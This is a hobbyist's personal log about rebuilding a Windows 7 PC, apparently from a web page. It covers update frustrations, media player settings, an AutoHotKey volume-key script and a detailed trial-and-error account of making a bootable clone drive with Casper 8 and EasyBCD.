       This utility tells me two USB hubs (#3 and #6) are used for my computer's six USB 2.0 ports. The mapping of the six USB 2 ports into the two hubs is rather odd. The two, top rear USB ports are hub #6 (ports #1, #2) and presently my two 2 Tbyte USB backup drives are plugged in here. The built-in front panel card reader shows up in hub #6 too (as port #6). The remaining four USB 2 ports are hub #3 (ports #1 and #2 front, #3, #4 on 2nd row in rear). This is where my printer (rear), TV turner and scanner go. Hub #7, which I think is USB 1.0, at bottom, rear is used for keyboard and mouse.

        The card reader is still enabled, but I rarely use this port, so I would probably be better off just disabling it permanently. I have a card reader cable for my camera cards. The only use I ever made of the built-in card reader is to load files on the tiny card in my Nook tablet. It fits into an adaptor, which I have long left in the computer slot. I thought the adoptor would be invisible with no card plugged into it, but I now find that when I plug in the empty adaptor it turns on a tiny led next to it. So maybe there is an issue here with leaving the adoptor in the card port. I am sure I could buy another card reader cable for this small adaptor.

Windows updates never ending
       And Windows updates continue, almost daily, an unrelenting annoyance. I did over a 100 after the install, with SP1 not offered. After that SP1 was offered, so did 2nd round of updates to get SP1. Couple of days later I am told there are 50 more updates waiting, every one of them like the previous 110, labeled 'critical', so I do a 3rd round of updates. To enable this process I had set Windows updates to automatic, didn't seem to work when I tried to manually search for updates.

        A week or so later when I boot my machine, the desktop does not appear, just a screen saying 'Do not turn off your computer configuring Windows'. Is this a Windows update? Maybe, who knows, it doesn't say that. How long is this going to take? Who knows, no progress bar. This goes on and on, the screen shows no action except for an oscillating '.' After15 minutes of this I am beginning to suspect whatever is happening has hung, but finally after 20 min or so the desktop appears. What a process Microsoft doesn't ask, doesn't warn, just takes over your machine! A few hours later I am informed more critical updates are available, it's just one, so I install it. That was last night, I just booted this morning and guess what, the'Windows updates available' on the taskbar is flashing again.

KMPlayer and VLC player
        I have hassled mucho hours with KMPlayer trying to get it to work right including downloading and installing it three times! I have long used it, but can not get the new version, and now a year old archive version to work like it did before. It has several problems. Here are three:

        The defaults are weird. One of the reasons I use it, is that it is flexible and allows old video, TV shows etc, to be better viewed because it has simple keyboard commands to adjust sharpness and light/darkness. But by default they don't work, and it totally unclear how to enable them. I downloaded a year old version last night and again they weren't working. All of a sudden without my doing anything specifically they started to work!

Blue screen crash ! (2/26/14)
       Big problem is that the video and audio drift (quickly) are out of sync, at least playing old SD TV shows. The video lags the audio. I have tried changing the bewildering array of video controls with no sucess. And last night the screen started acting weird and 30 minutes later (not using KMPlayer) I had a blue screen crash of the computer!! Yikes, after a clean install and three weeks work. I have my fingers crossed that my playing with the video controls, which causes the KMPlayer screen to go weird, might have triggered this crash. I immediately uninstalled KMPlayer (including preferrances) and downloaded this time a year old archive version. VLC plays the same files OK with its defaults, but not with the same clarity (no sharpness filter).

Screen capture
       A minor, but annoying, problem with KMPlay that I never had before is that the screen capture width (viewed 'full size' in my favorite viewer  ADCSee ver 7) is not the same as the video on screen. The width of the screen capture is a little wider. (I suspect the capture may be the actual size of the original SD program and viewing version is narrow, but it is hard to be sure. Both versions of KMPlayer do this. I am using exactly the same ADCSee program I have always used, no upgrade here. Maybe it's something to do with how I have my monitor screen resolution set up. I have played with all the KMPlayer screen options, of which there are many.

        VLC viewer has the opposite problem. It's screen capture by design seems to be poor. It's screen captures in all three formats (.png, .jpeg, .tiff) are smaller and with clearly less resolution that the video on screen. I need to expand a capture by 140% for it to match the original screen view. After tweaking all the screen capture options of both players I find the KMPlayer capture (even with its width issue) is of much higher quality that VLC, so I would like to get the KMPlayer to work. Maybe try an even older version, which I do see in the archive list.

        Vol control from keyboard --- Volume scripts turned out to be based on AutoHotKey. After some work I think I have figured out how this works. Only need two files are needed AutoHotKey.exe  and vol_mute.ahk script file. AutoHotKey seems to be dying (some links are dead, but I found the executable). Here are the tricks:

                            a) AutoHotKey can be put in any directory
                            b) file associate .ahk (script) files with AutoHotKey.exe
                            c) Put vol_mute.ahk script file (few lines of text) in startup directory

Where the hell is the startup directory?
        The startup directory is hard to find. If you put startup (or startup folder) in the Start search box, Windows 7 pretends it doesn't know what you are talking about. That's right Windows 7 cannot find it own startup folder(s)! This folder is buried about ten layers deep! Yikes, and there are two startup folders (confirmed below):

All Users startup folder should be
            c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Your personal startup folder should be
            c:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

                                                ; AutoHotKey xxx.ahk script
                                                ; ! <=> Alt

                                                !PgUp::Send,  {Volume_Up}
                                                return

                                                !PgDn::Send,  {Volume_Down}
                                                return

                                                Break::Send, {Volume_Mute}
                                                return

(new)                                       ScrollLock::Send, {Volume_Mute}
                                                return

        The AutoHotKey volume script above, which I threw together using various references and trial and error, works like before, pretty good, but with some occasional Mute squirrlieness. I suspect some of this is Windows bugs in how the media keyboard commands are interpreted. I experimented increasing the volume steps, like {Volume_Up 2}, and find it unreliable. It will work on some screens and when hotkeys are function keys, but (for some crazy reason) the numbers are ignored with PgUp and PgDn are used! The single volume step used above is 12 steps for half volume with the volume ramping if the keys are kept depressed. (script above is a little verbose --- my tests show the comma after send may not be needed. Some sample scripts don't use 'return', but when I didn't use it the 2nd and 3rd hotkeys did not get pickup.)

        I need to do something to improve the original script, because I find that while the original code above works OK for videos, and generally for the TV tuner, sometimes the TV tuner sound gets muted and no matter what I do I can't get it to unmute. The key I have long used for Mute on/off is the Break key (corner key), and I now suspect this is where the problem lies. It is called 'Break' for a reason. In the early day of computing, when nearly everyone was writing software, it was used to stop code (break out of infinite loops), so my guess is this is some sort of interrupt key, i.e. not a normal keyboard key. The key next to it is ScrollLock, and this key is virtually never used either, so I added the bottom lines above to allow this key to also mute and (more importantly) unmute the sound. Initial tests are encouraging.

        Video capture --- Here I have run into a real roadblock. The program I was using and loved I finally figured out was called Freecorder 4 (for some reason my shortcut was named FCvideo, which did not come up in Google). It ran unobtrusively in background recording all video (except YouTube).  The company (Applian) is still around, but it has withdrawn the free version 4. Can't find it archived anywhere, all download sources link to the vendor. Sampled version 8 and it stinks. Need to look for new video capture software.

        Home network --- I have three computers on my home network (Windows 7 desktop, old XP desktop (wired) and old Vista portable (wireless)), but it came up a kludge and remains a kludge. Windows 7 should be able to set up a home network easily but I found this not to be the case. I wanted to copy over some old programs that I knew from earlier  work need not be installed. One in particular was a key program that I use to support my homepage, the html editor, Netscape 4.8 composer. I knew in the past it had been archived online, but I wanted to just copy it over. It should have been on my backup USB drive, but it wasn't (big mistake), but I found copies on the other two computers.

        For the life of me I could not get Windows 7 to see the XP (maybe something needs to be run on the XP) though it found the Vista portable, and the Vista could see the XP. I found I had only very limited file sharing between the Window 7 and the Vista portable because of permissions. I would set the Window 7 c:\drive to share with everyone having full control, but Vista claimed Windows 7 would not allow files to be saved. Madening! By trial and error I found the Vista could write files to the Windows 7 c:\user\public folder, so this allowed me to copy over Netscape 4.8 to my newly setup Windows 7, where after being moved to a proper home, it ran fine.

        KMPlayer setup -- KMPlayer has long been my standard video player, but it is a nightmare to set up. It's defaults are terrible, for example none of the video controls worked (sharpen, lighten, darken), which is one of the reason I use this video player. I am pretty familiar with its (seemingly) hundreds of options, but after spending hours playing it still isn't working as well as my old version did. I (finally) got the video controls working by clicking the very last choice: on 'Configuration Management' page check 'Start KMPlayer with default preset.' What this does I have no idea, but with it checked sharpen and lighten/darken work. Another (core) problem was with default setting the sync between audio and video was way off  (seconds) and would not sync up. I finally solved (well not really sync still slips) this one too by noticing that after a sync command, the video began to slip more and more behind the audio. It was like the video processing could not keep up. Clicking off some (???) video processing fixed this problem. A 3rd problem, still unsolved, is that frame captures are mostly blurry, what capture gets is not what shows on the screen. I can't seem to fix this. Very frustrating.

        One the other hand VLC videop layer came up 'out of the box' (so to speak) playing video files fine with its default settings.

        Create restore point (script file) --- With my old Windows 7 over the last two years regularly deleting restore points it was essential that I have an easy way to create restore points (I had made over 250 in two years).  This is another script file/shortcut that I had found online and didn't understand, or know anything about, but I found it. It is [CreateRestorePoint.vbs], which is a .vbs script file. It can go anywhere, the desktop shortcut just has to point to it.

        inSSIDer --- This was a very nice, free WiFi strength monitoring program, very useful in hotels, but it's no longer available from its creator as a free utility, so I thought it was gone, There is a new version, but it is not cheap. But I got it back. I found older, free version, inSSIDer 2.0 on my Vista portable, and when I copied it over, it just worked. Uninstalling the trial version should get rid of an annoying upgrade popup from MetaGeek, its creator.

Upgrade losses
        I had always run Windows 7 with updates off, which might explain why I was so vulnerable to FBI Stop viruses, which attacks totally stopped months ago for unknown reasons. But with this clean install I decided to let Windows upgrade do its thing, with 100+ 'critical' upgrades listed + SP1 (service pack 1) followed by another 60 critical upgrades. After the first hundred and SP1 no problems, but I just did the latest batch of 60 upgrades and yikes my desktop is messed up. First I found the toolbar at the top, OK and easy fix to move it back down to the bottom, but where are my widgets: clock and two local temperature monitor, all three of which I use constantly.

        No widgets --- Not only were my three widgets gone after the lasted Windows upgrade, but when I right click the desktop and select widgets nothing happens. What? When I google this I find in 2012, Microsoft learning about a security hole in widgets decided not to fix the hole, but just to shut down widgets. Yup, one of the features of Windows 7 has been (unceremoniously) removed because it was cheaper to just eliminate it than to fix it! Typical Microsoft. They are still selling Windows 7 for $100 no less, but are unwilling to properly maintain it. Another loss, the right side of my desktop is bare, so I need to search for replacement clock and weather quasi-gadgets to replace what I lost.

        Clocx --- This free utility is a pretty good replacement for the clock and calendar (http://www.clocx.net). I am using clock face : ane44, which is a basic analog clock, very similar to the gadget clock. This is one of hundreds of clock faces built in! However, because it is a program and not a gadget, Windows key D causes it to disappear, so when you go to look at the time it's not there.

Useful Windows tools
        'Administrative Tools' --- Typing 'Administrative Tools' in the search box bring up a bunch of useful pages: control boot, shut down services, check out and change partitions on hard drives. You can get here also: Control Panel, System and Security, Administrative Tools (After deleting all the Acronis services I could find, I find three Acronis services here, one of which is running at boot.)

Disk Cloning
        I have been reading about cloning vs backups. Looks like pros often use cloning. Daily or weekly they image copy their whole hard drive onto a hard drive similar to their inside hard drive. When their drive craps out, they physically remove it and plug in the clone. In 15 minutes they can be up and running. Recovery from the re-install has taken most of a month. Need to learn more.

        -- ** Youtube video says WD advised a guy to attach new (internal) Sata drive to USB port via 'Sata to USB cable' and use clone software to copy the internal hard drive to it. This is interesting because I bought a 1 Tbyte Sata drive and Sata to USB cable a couple of years ago (at my last crash) and never used them. I would need to search out clone software and try this. This could be interesting. Would be fairly easy to make backup, but would required opening case to put in the cloned drive.
        -- Bytecc duplicator (Amazon $40).  This is box with two slots for Sata drives. Plug in source and target, push button. Cheap and simple. OK if planing to upgrade or replace a good drive, but not sure how useful. However, one use might be to make a 2nd backup clone from a primary clone.
        -- ESata cable --- Reviews report that a Sata drive connected internally via this cable (3 ft or 6 ft) allows the external drive to work like the c:\ drive with Windows 7. Sata hard drive docking stations cost only $25.
        -- Why did Windows image fail?    (Recover program could not see the USB drive)
       -- The problem with popping in an infrequently cloned whole c: drive, of course, is that all your recent data files need to found, which could be a huge pain. Cloning probably works much better if files are reorganized. One thought that comes to mind is all critical data files could be kept off the internal drive, but this only makes sense if the primary USB drive is backed up regularly to the secondary USB drive. The key is probably to have software that regularly backs up all critical data files nightly to an external drive, so if a clone goes in the old data directories can just be overwritten by the backed up directories.

            I see experts talking about more extensive rearrangement that separates data, programs, and windows into different partition. But I suspect in practice this is tricky and it a lot more techy than I want to get.

        -- Check to see if my bios will allow a boot from USB drive. (Yes. 'Esc' brings up boot menu at power up and both my USB drives are listed.) If so, then Clonezilla disk will make a clone to a USB drive than can be used to boot and recover.
        -- Several user recommend for cloing Macrium Reflect 5 Pro (http://www.macrium.com/) and they have a free version

Clone experiments (3/31/14)
        A while back when I had my first Windows crash, I had bought a 1 Tbyte internal SATA drive plus a USB adaptor cable for it, thinking I would try and recover some files. When my computer (mysteriously) came back to life and booted, I let them sit unopened.

My new 1 Tbyte drive is
                Seagate Barracuda 1 TB HDD SATA 6 Gb/s NCQ 64MB Cache 3.5-Inch Internal Bare Drive ST1000DM003
                $58 Amazon, 2,000 reviews (another source of info) One reviewer cloned his primary drive to this one (1 hr), just moved the Sata cable, and the machine booted from this new drive.

http://www.amazon.com/Seagate-Barracuda-3-5-Inch-Internal-ST1000DM003/dp/B005T3GRNW/ref=pd_rhf_se_s_cp_46_JTVF?ie=UTF8&refRID=0PZX1W3QE0TF9RRTC443

Internal 1Tbyte Seagate sata drive connected via USB converter
       Well today I opened up the hard drive and USB converter boxes. After puzzling for a few minutes, I figured out how to connect the cables (unlike any of the figures on the box!) and got it working. Opening Windows Disk configuration it was visable, shown 'uninitialized', but was not visible in Explorer. In Disk configuration after a web search selected copy Master Boot Record? (MBR?), which is what you want for drives 2 Tbyte or less, and then format, assigned letter (F:\) and that did it. It now showed up in Explorer with correct size, and I copied over a file to verify it was working.

        "I have spent many (many!) hours studying backup strategies, and of course there are many depending on one's needs. The most elusive of all however (detailed by hundreds of posts from myself and others on these forums) has always been the simplest of all - the Bootable HDD Clone Disk (BCD henceforth)." (forum posting) This guy went on to say he wanted to boot without using ANY recovery media or environment. Amen! And that he couldn't find any software that said they do this.

        What I want is multible bootable drives I can select from the bios order. See zero info on this!!

        Look into this. It is $50, but they have a 30 day free trial! (downloaded it and used it to clone (copy) internal drive)

(update)
        I have now tried several (free) clone packages and the one I like the best so far I Casper 8. I think I may buy it. One nice feature it has that others don't have is that after it first writes a clone, it can 'differentially' update it meaning it scans both drives and only writes the sectors that have changed. This differential backup takes about an hour and can run in background while computer is being used. The latter is possible because clone software uses some sort of volume sampler that Microsoft has built into Windows 7.   Some posters are skeptical that you can reliably clone from within working Windows, but this is probably a solved problem. No article on cloning mentions this as an issue.

Bootable HDD Clone Disk
        From my online reading I find there are a bewildering ways to use two hard drive, but seems to me to the guy above has got it right. To avoid the nightmare of reinstalling all my programs (a months work!) what I think I want is the second drive to be a clone of the first. It needs to be bootable, and in case of a problem with my primary dirve can't I just at power up (using Esc) just change the boot sequence and boot up on the clone?

Not Raid 1
        I think my computer supports Raid and at first this seemed like the way to go. Choosing 'Raid 1' automatically has the 2nd drive mirror the first. Ok, this protects from a sudden physical failure of the primary drive, but it would not have protected me from the problem I just had where over a week or two Windows got unstable and I began to have blue screen crashed. Seems to me in a mirror configuration, I will just have unstable windows (c:\ and probably d:\) on both drives.

Clone primary drive on internal via USB
       First test is to clone my primary (system, c:\ and d:\ partitions) to the 1 Tbyte internal now running via USB. I am going to try (free) Macrium Reflect for this. (Took a look at Seagate disk clone and didn't like it). Whether or how to make it bootable will require some research and trial and error. I'm thinking after the clone I will just try and see if it boots from it. I can already see the new 1 Tbyte drive in the boot sequence, where it is now 6th and last.

        I probably should make an image file too on 2Tbyte drive #2, which has lots of room.

Test of Casper 8 clone (copy) (3/31/14)
        I download a 30 day trial version of Casper 8 and used it to 'copy' overnight the entire contents of the internal 700 Gbyte drive to my 1 Tbyte internal drive hooked up to a USB port (via an adaptor). It reports the copying took 2 hr, 20 min (100 Gbytes used) and the copy looks perfect. I made a minor change and did a recopy. Casper says they use Smart Technology and only recopy what has changed, nevertheless the incremental update copy took 1 hr, 10 min half the time of the full copy. (It spends a lot of time comparing the disks first.) However, amazingly the smart re-copy works in the background while Windows is being used. How it does this I don't know.

        I specifiied during the Copy that the extra drive space on the new drive (250 Gybe nominal) not be used (not the recommended option, which is to spread the copy over the new larger disk). Seems to me this is important if I need to copy the clone back to the original drive. However, Casper does claim that they can copy a larger disk back to a smaller. I like the clone (Casper calls it 'Copy'). I think this is the way to go for backups. It needs another drive, a dedicated drive, but so what.

Is the clone bootable?
        Now the 64 dollar question, Is the clone bootable? Surprisingly this is very hard to tell. I can select the clone USB from the boot menu, and boot goes OK, but I don't really know if it is booting from the USB drive or not! Searching online did not reveal any clear cut way to tell. I tried with a paper tube to listen to the disk head, but this test was inconclusive, I head head noise with both boot options. I can think of one way to tell, but I haven't tried it yet because I am worried things will get screwed up. The test is to pull out the USB during the boot process, probably pulling it quickly would be the safest.

        Damn, there's a very good chance I am not booting off the clone. I pulled the clone and plugged in 2 Tbyte #2, which is clearly not a bootable drive. I selected the 2Tbyte drive at power up and Windows booted normally, so this test shows Windows will clearly boot from its internal drive if a non-bootable drive is selected from the boot sequence.

        For the clone to be bootable it needs a  'bootable master boot record' or 'active partition'. Below is the option Casper says to use to make the clone bootable: 'Copy an entire hard disk'. This is not 100% clear. I chose copy and the three partitions of the internal drive were default check marked, so is this copy the entire hard disk?

After copying my Windows system drive to a new drive, I cannot boot from the copy. Why not?  (Casper Q&A)
        The most common reason for this problem is the absence of a 'bootable master boot record' or 'active partition' on the target disk. When using the 'Copy a specific drive' method to copy one drive to another, Casper does not replace the master boot record or change the active partition status on the target disk.

        In order to ensure the target disk contains a valid master boot record and the appropriate partition is marked active, it is necessary to use the 'Copy an entire hard disk' method. Alternatively, Casper Explorer may be used to apply a genuine Windows master boot record and change the active partition status on the target disk. (?? don't see this)

        For additional information related to resolving boot problems, see the help topic entitled 'Resolving Boot Problems' under the 'Troubleshooting' section in the Casper help file. For help with replacing a master boot record or changing the active partition on a hard disk, see the help topics 'Repair' or 'replace a master boot record and Mark a partition active' under the Disk Management section of Working with Casper Explorer in the Casper help file.

F10 accesses the main bios screens (Esc selects boot order)
            My 1 Tbyte shows up in the CDRom group (as #2 in the group) which as priority, so from this I would think it would boot. Tried to make it #1 in the CDRom group, but can't. But I can see from Disk Configuration that all booting looks like it is being done from internal drive. The two Seagate drives are easily told apart by looking at the total size. The boot partiion is marked and in every case its on the internal drive. I need to check if my USB 1 Tbyte drive is bootable, because if it is I would think I would have booted from it by now.

            Shows my machine has Sata on mother board, which means the new drive can probably plug in.

Bootable clone drive?
        I now suspect that when I select it at boot I am (or might be) in fact booting from the clone 1 Tbyte drive. When I boot from inside drive selected and pull the USB plug at boot (did it twice) and nothhing happens, machine boots normally. But when I selected boo from USB USB 1 Tbyte clone and pull the USB plug (when Windows spirallng four colors appear), the boot freezes! Of course, the real definitive test is opening the case and disconnecting the 700 Gybte internal Seagate drive. But it leaves open the question if windows goes bad must I open the case and remove it. An interesting test might be to disable some Windows file (how?) on the internal drive and see if Windows runs OK from clone.

** Need to open case to disable drive with 'bad windows'
        Unfortunately even if the clone boot loader is working I can see that the Windows running is from the internal drive. Two ways I see this. One ran a simple test to screw up Windows by shutting off desktop icons ('Right click on desktop - View - uncheck show desktop icons'). When I turn icons off and simply reboot, they stay off. Unfortunately when I select the USB 1 Tbyte to boot from they stay off too! Also I downloaded a new utility since I made (and updated) clone (EasyBCD), there it is in the c:\ drive, but it is missing in the clone F:\ drive. So my expectation is that if I unply internal drive Sata cable and I really am booting from clone, which will be obvious, what I now see as F:\ (with no EasyBCD) will become the c:\drive.

        Macrium help files explained that there can't be two c:\ drives in Windows, implying that the clone files will show up initially as a higher letter (F:\ in my case), but that when the internal drive is removed (unplug the Sata cable), that drive letters will 'settle down' with the clone probably showing up as c:\ and if it doesn't c:\ could be assigned on Windows disk configuration page. I ran a test adding an image to c:\ drive on the clone, and even after booting from it shows up on the F:\ drive. Does this imply that Windows is running of the internal Windows files and that it is required to pull the internal Sata cable. Not sure. This needs to be tested I need a bad windows!

        F10 (Setup) is the full bios set of screens like Windows computer have had for years. These bios setting are stored in CMOS, so using these bios screens to make a temperary change in boot sequence means changing it. and then later changing it back. To make repairs easier newer bioses have another hotkey that offers a one time (in ram) way to change the boot sequence, which in my HP is called 'Boot Menu' and is brought up with the (corner) Esc key. This must mean the Boot (Esc) sequence is an override of the CMOS boot seqence. Still it is a little confusing. I find the Boot (Esc) list always seems to show the internal hard drive first, but in the  CMOS sequence the disk drive group, which includes the internal drive, come after the CD/DVD options. Maybe this is affected by having no bootable CD/DVD in the drive.

        My supposendly bootable clone 1 Tbyte when connected up (and powered) prior to boot does show up in both lists. So the way to set it as the boot drive is (very likely) to select it using the Boot (Esc) sequence. Earlier when I did this and pulled the USB plug during boot, the boot froze, so I may have been booting from the USB driver. Nevertheless, I haven't yet been able to get the setting of windows on the USB drive to show up at boot.

        Bios setting (F10) show the boot sequences. Boot sources are in groups and groups sequence too. First group is CD/DVD drive and in this group I find the 1 Tbytes USB drive. Next comes the hard drive group. There were three drives here, the internal Seagate 700 Gbyte and the two 2 Tbyte USB drives. I found the internal Seagate drive was not #1 in this group. It was listed after one of the USB drive. This might be an important reason why with USB stuff connected boot is 2-3 min vs 1 min. I moved the internal drive to the #1 position in the drive group.

Disk structure
        From Wikipedia (System partition and boot partition). Microsoft defines these terms essentially reveresed compared to all other operating systems. Microsoft defines the terms as follows:

        * The system partition is a primary (hidden) partition that contains the boot loader, a piece of software responsible for booting the OS. This partition holds the boot sector and is marked active. [This is only 30 Mybes on a 100 Mbyte partition with no letter. It has the boot loader and boot sector (probably MBR --  master boot record)]

        * The boot partition is the disk partition that contains the operating system folder, known as system root [This is the c:\ partition and contains the OS files as well as programs and data.]

Active partitions (4/3/14)
        I saw one quick reference in an article that you needed to go into disk configuration and mark a partition 'active' for a drive to boot. Then on a Microsoft site I found this:

Mark a partition as active
        Marking a partition as active is an advanced task that should only be performed by advanced users (and only by administrator). Marking a partition as active on a basic disk means that the computer will use the loader on that partition to start the operating system. There can be only one active partition per physical hard disk. You can't make a logical drive (i.e a partition assigned a letter like c:\ or f:\) or an extended partition active. Only a primary partition can be made active. [100 Mbyte System partition with no letter has the boot loader and boot sector. For this physical hard drive to boot its System partition needs to be marked 'active' to allow its loader to load.]

        ** If you have multiple hard disks installed on your computer, it's possible for each (physical) hard disk to have a System partition set as active. The active partition on the first hard disk that your computer's BIOS detects is the one that will start the computer.

Windows 7 with four physical hard drives, internal plus three USB hard drives
Disk 0 --- Internal 700 Gbyte (sata) drive
Disk 1 --- 1 Tbyte sata 'clone' drive connected via USB (bootable status unclear)
Disk 2 and Disk 3 are 2 TbyteUSB drives used for data backup

EasyBCD
        Guys with two operating systems installed need an easier way to chose between them at boot, so for them there are utilities that pop up a system selector (with timeout) during boot. I downloaded a popular freeone mentioned on forums: EasyBCD utility (NeoSmart Technologies). Took a while to figure out, but now it asks if I want to boot from the F:\ drive with 10 sec timer that defaults to internal drive. Based on my tests it looks like this utility probably overrides the Boot Menu choice, since it come up afterward. This utility says it looks for the same boot loader file on (external ) F:\ that it looks for on c:\. I have verified the file is there on F:\, but when I select it, I immediately get a message it can't boot from there. Don't understand what is going on.

        OK, I think I figured this out. I have bypassed this hurdle and MsConfig is telling me I have booted from the USB clone drive. While the clone software (here Casper 8) has put the boot loader onto the USB clone drive's 100 Mbyte System partition, it's not yet ready to boot. A check of the clone partitions with Disk Configuration shows its System partition is not marked 'active', like the disk 0 internal drive. To (in effect) activate the clone drive to make it bootable, you needed to mark the clone's System partition as active. This is done using Disk Configuration screen and right clicking the disk 1 clone System partition. After I did this, the can't boot from there halt went away.

USB clone drive now booting(4/3/14)
        I am coming to believe that finally, after two to three days work, I have make a USB clone drive that now can, and has as I write, booted my computer. The version of Windows OS on the clone drive is running the computer.  And this was done without pulling the internal hard drive cable or physically disconnecting it in any way. Note that above left the boot screen of MsConfig says exactly this: 'current OS' is my entry is the USB clone drive.

        This what I did to get the clone backup drive working to allow recover is Windows 8 on the internal drive gets sick or crashes:

                    1) Clone internal 700 Gbyte drive (using Casper 8) to 1 Tbyte drive connected to USB port (via sata to USB converter)
                    2) Manually mark the USB clone's (disk 1) 100 Mbyte System partition as 'active'
                    3) (optional, I hope) Utility 'Control EasyBCD' for dual boot select between internal OS or clone OS, and to verify which OS is running

My misunderstanding?
        I had assumed that if the clone OS booted, then its version of the c:\ directory (normally f:\ drive) would show up as c:\, but it doesn't, it is still the f:\ drive, which is why for a long time I have not thought it was booting. Is this OK? Well it is not a clean transfer of control. I guess I can go into the f:\ directory and run programs off the clone. The problem I see is that all the shortcuts on the desktop still point at the c:\ drive which (by test) looks to be the internal drive and could be sick. So this is my current understanding:

How to use a clone drive
        Ok, I have an external USB clone drive that seems to work. At least using the utility Easy BCD I can boot from it, and presumably with more testing I can verify that I can boot with it by changing the bios drive order. What can I do with it? Is it only useful as a replacement drive, which requires opening the case and physically moving cables? This may be no big deal on a well lit lab bench, but is a real hassle at home when the drive is on the floor sitting in a tangle of wires and not well lit. No, there's another use, a very important use: Data Recovery! An Apple article on cloning mentioned data recovery and this use had not occurred to me.

Data recovery with a clone drive
        I had been thinking that the only old use of a clone drive was as a replacement for a bad (internal) Windows or bad internal hard drive. There would be the hassle that all the user data files would be old (as of the date of the clone), so they would need to be replaced later from backup media (if such newer files exist, which they probably don't). I now think this is the wrong way to think about it.

Updating the clone
        Most article speak of a clone as as 'snapshot in time', and when it is swapped in for the original all your programs and data revert to the date the clone was made. But this is misleading. I am pretty sure data files on the clone can be updated while it is external using Windows Explorer, and it will still work properly when swapped in. The it is not a gem that can't be changed. When the clone drive is connected via USB, its version of c:\ directory shows up as the f:\ directory. To Explorer the clone drive is just another external drive that can be read from or written to. I don't see why there would be a problem writing new data files on the clone. Explorer is not going to overwrite its system files! (Changing programs on the clone, however, is a totally different matter and I suspect should be avoided unless you are an expert.)

Data recovery
        With the perspective that updating clone data files is OK, the first objective should be to try and copy the latest version of data files from the internal drive to the clone so when it is swapped in, you will really be back to normal. The clone is probably already connected to the computer via USB so just leave it there and leave the internal drive connected too. In other words physically do nothing (easiest option). Power up changing the boot order sequence to boot from the clone. The OS running is now Windows files from the clone drive. From a few tidbids I picked up I think (not having tried this yet) what Explorer will do is this:

            a) Internal disk drive working  --- Explorer's c:\ drive will be the original c:\ drive files read from the internal drive. The older snapshot of c:\ files on the clone drive will show up in Explorer as a higher letter, in my case as the f:\ directory.

            b) Internal disk drive not working --- Explorer's c:\ drive will be the snapshot of the c:\ files as of the date the clone was made (or last updated).

Desktop puzzle
            However the above scenario omits a crucial detail the desktop. My tests show that what appears is the original desktop, not the clone date desktop, which I find surprising. What happens if original desktop is messed up, doesn't appear, is blank? In fact when I run a test shutting off the desktop icons (right click desktop backgroun, view, uncleck 'show desktop icons') and boot from the clone the desktop comes up BLANK. This could easily happen with a sick Windows, so how then do you run Explorer from the clone to recover data files from the internal drive? (see below 'Get to Explorer')

        You can't really run the computer, at least not cleanly, from the clone if the old desktop comes up. All its shortcuts point to the c:\ drive, which if the internal drive is functional will be programs on the internal drive. Can you run programs off the internal drive from Windows running off the clone? I just don't know, but it sounds risky. I suspect the right procedure is just try and recover data files, maybe copy over some programs, and then swap in the internal clone for the ailing internal drive.

Get to Explorer
        Here's an option that might work if you boot from clone and no desktop. Try ctrl-alt-del to get to Task Manager, under file,  new task (run), type 'Explorer'. (There is also a browse button here that opens Explorer.) When I do this with a healthy internal drive, Explorer starts and I can see the internal c:\ drive and clone f:\ drive, so I could do data recovery to the clone. Unfortunately I can't verify that the Explorer I am runing is really from the clone's version of Windows, that it would start if Explorer broken on internal drive Windows.

Explorer c:\ files from which physical drive?
       I was initially puzzled when I booted from the USB clone with the internal hard drive still in place and working that the clone's version of c:\ files show up as the f:\ drive, but thinking about this it's probably the most logical thing for Explorer to do. It makes it clear during data recovery what to copy to what. If Explorer did the opposite and showed the booting clone's (old) c:\ files as c:\ and the (newer) internal c:\ files as f:\ it would be horrible confusing.

        My understanding now is that Explorer will display as c:\ files those from its internal drive (if present). The files from all external drives, even if the computer booted from an external drive, will show up as other letters. (If there are two internal drives, both connected by sata cables I don't know what happens. There must be some way of designating one as primary and one as secondary.

                        No USB devices                                                50 - 55 sec
                        All USB devides                                               1 min, 15 - 30 sec                       (after setting internal hard drive #1 in HDD group)

        With the rearragment of the boot seequence (F10) (and Easy BCD boot loader in), boot is quite fast and the weird delay is gone, Restore starts in a few seconds.

Opening HP desktop case
        For first time since I owned this HP Windows 7 computer I opened it up. Not a fun job, since it sits on floor wedged between my old XP machine and a power supply for my old HP scanner and with a USB Cannon scanner sitting on top. Had to move the top scanner and PS. Pulling off the side panel was easy once you know how. Remove one screw (rear, center, left) grab the sort of handle next to it and pull back a little (to clear a holding tab) and the right side panel (as seen from front) just lifts off. I then just tipped the computer on its side so I didn't have to remove the outside cables, and it should be fairly easy to close up again.

Fans
       First surprise is I find two (maybe three) large fans inside. I have always considered the HP whisper quiet, this is one reason I buy HP. Occassionally I hear high fan noise, so the fans must be variable speed and normally run slow and quiet. Even with the cover off I can see them running, yet I can barely hear them. One fan sits on top of the CPU heatsink on the motherboard, a slightly larger fan cools the case mounted on the lower rear air grate. I suspect there is a 3rd fan on the grate top rear grate to cool the power supply, but it is would be inside the PS box and is not visible.

Sata
        Yup as expected the internal Seagate hard drive is a sata type. It has the same two cables (power cable and sata data cable) that connect up like my external 1 Tbyte sata drive. The power supply cable is four wire (yel, black, red, black) that comes from power supply bring in +5V and +12V. The internal sata (serial) data cable is just like the sata cable that came with kit, a flat small red cable with distinctive corner shaped polarizing lockings, and it goes to the motherboard.

        ** Yikes, I just found out my cludgy kit power wiring to the clone drive is very marginal. When I just touch the cable, I get a USB connect sound and leds flash. The power connector never did seat correctly and is clearly very marginal!!

        One thought is to buy sata expansion cables on Amazon and put them in and leave them in. With a longer sata cable containing a connector the clone drive can much more easily be quickly swapped in and/or the internal drive can be disconnected and the clone run via USB. I first thought of looping the sata cable outside the case, so I would not need to open it to quickly get the computer functional, but this doesn't look practical. For one thing it means the case side panel cannot be reattached. For another a critical cable would be outside and subject to damage, and the sata cable is pretty stiff so it will require a large outside loop.  Forget about this.

        An inside sata loop with connector can work. It really only requires that the right side of the computer be accessible. I know now how to pop off the right side panel. It would be a good idea to also have on hand a plug-in power brick (or enclosure) to power the clone disk drive (2A +5V and +12V) and allow a long sata cable to be connected. This should allow the computer to run normally since it would have as usual a single drive connected via sata, but without the hassle of mounting the drive physically in the drive bay. I have a hard drive brick now, it was part of the kit I bought, but the power connector is poor and the connection marginal. (Don't know if it can be fixed.)

Clone drive tests
